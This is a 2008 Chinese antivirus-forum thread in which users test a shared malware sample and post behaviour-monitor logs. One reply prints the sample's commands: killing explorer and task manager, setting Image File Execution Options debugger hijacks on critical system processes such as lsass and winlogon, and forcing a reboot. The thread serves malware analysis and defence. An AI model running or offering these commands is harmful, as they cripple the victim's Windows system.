收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 继续.過剩两个殺毒軟件最厲害的病毒~!
123456789下一页
返回列表 发新帖
楼主: 170912556
 收起左侧

[病毒样本] 继续.過剩两个殺毒軟件最厲害的病毒~!

[复制链接]
gunman30
发表于 2008-1-22 13:53:42 | 显示全部楼层
十分的强悍,居然全过了,卡巴没反应
回复

举报

左手
发表于 2008-1-22 13:55:48 | 显示全部楼层
2008-01-22 13:51:44    创建文件      操作:阻止
进程路径:C:\Documents and Settings\Administrator\桌面\李毒(qq170912556).exe
文件路径:C:\Documents and Settings\Administrator\桌面\1.bat
触发规则:所有程序规则->全局设置_可执行文件1->%SystemDrive%\*.bat


2008-01-22 13:51:45    创建文件      操作:阻止
进程路径:C:\Documents and Settings\Administrator\桌面\李毒(qq170912556).exe
文件路径:C:\Documents and Settings\Administrator\桌面\1.bat
触发规则:所有程序规则->全局设置_可执行文件1->%SystemDrive%\*.bat


2008-01-22 13:51:45    创建文件      操作:阻止
进程路径:C:\Documents and Settings\Administrator\桌面\李毒(qq170912556).exe
文件路径:C:\Documents and Settings\Administrator\桌面\1.bat
触发规则:所有程序规则->全局设置_可执行文件1->%SystemDrive%\*.bat


??/
回复

举报

星之梦
发表于 2008-1-22 13:58:04 | 显示全部楼层
下来试试
回复

举报

醉一生爱妍
发表于 2008-1-22 14:01:38 | 显示全部楼层
原帖由 左手 于 2008-1-22 13:55 发表
2008-01-22 13:51:44    创建文件      操作:阻止
进程路径:C:\Documents and Settings\Administrator\桌面\李毒(qq170912556).exe
文件路径:C:\Documents and Settings\Administrator\桌面\1.bat
触发规则:所有程 ...

那个1.BAT可不是一个好东东
回复

举报

14139638
发表于 2008-1-22 14:18:12 | 显示全部楼层
吓人啊!不过还是不敢事,这个电脑现在什么都没装
回复

举报

星之梦
发表于 2008-1-22 14:49:27 | 显示全部楼层
2008-01-22 14:33:24         
C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\system32\taskkill.exe
/f /im explorer.exe
->系统程序->*

2008-01-22 14:35:07         
C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\system32\taskkill.exe
/f /im taskmgr.exe
->系统程序->*

2008-01-22 14:35:27         
C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\system32\reg.exe
add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe" /v debugger /t reg_sz /d debugfile.exe /f
->系统程序->*

2008-01-22 14:35:32         
C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\system32\reg.exe
add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /v debugger /t reg_sz /d debugfile.exe /f
->系统程序->*

2008-01-22 14:35:36         
C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\system32\reg.exe
add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smss.exe" /v debugger /t reg_sz /d debugfile.exe /f
->系统程序->*

2008-01-22 14:35:39         
C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\system32\reg.exe
add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe" /v debugger /t reg_sz /d debugfile.exe /f
->系统程序->*

2008-01-22 14:35:45         
C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\system32\reg.exe
add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winlogon.exe" /v debugger /t reg_sz /d debugfile.exe /f
->系统程序->*

2008-01-22 14:35:50         
C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\system32\reg.exe
add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\services.exe" /v debugger /t reg_sz /d debugfile.exe /f
->系统程序->*

2008-01-22 14:35:54         
C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\system32\reg.exe
add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe" /v debugger /t reg_sz /d debugfile.exe /f
->系统程序->*

2008-01-22 14:35:57         
C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\system32\reg.exe
add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe" /v debugger /t reg_sz /d debugfile.exe /f
->系统程序->*

2008-01-22 14:35:59         
C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\system32\reg.exe
add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regsvc.exe" /v debugger /t reg_sz /d debugfile.exe /f
->系统程序->*

2008-01-22 14:36:01         
C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\system32\reg.exe
add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winlogon.exe " /v debugger /t reg_sz /d debugfile.exe /f
->系统程序->*

2008-01-22 14:36:04         
C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\system32\reg.exe
add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mstask.exe " /v debugger /t reg_sz /d debugfile.exe /f
->系统程序->*

2008-01-22 14:36:06         
C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\system32\reg.exe
add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplorer.exe" /v debugger /t reg_sz /d debugfile.exe /f
->系统程序->*

2008-01-22 14:36:12         
C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\system32\shutdown.exe
-r -t 59 -c "你的电脑已经玩完了!"
->系统程序->*
回复

举报

jyhhry
发表于 2008-1-22 15:00:02 | 显示全部楼层
KIS没反映看样子还是主动防御才行。。
回复

举报

冷冷
发表于 2008-1-22 15:00:08 | 显示全部楼层

回复 16楼 星之梦 的帖子

原來有這么多的程序被劫持
回复

举报

星之梦
发表于 2008-1-22 15:02:53 | 显示全部楼层
还有COM调试系统内核,被comodo拦了.

这个东西为什么会过杀软呢?
回复

举报

醉一生爱妍
发表于 2008-1-22 15:06:06 | 显示全部楼层
没有显著的恶意行为特征吧
回复

举报

下一页 »
123456789下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-25 15:06 , Processed in 0.102964 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表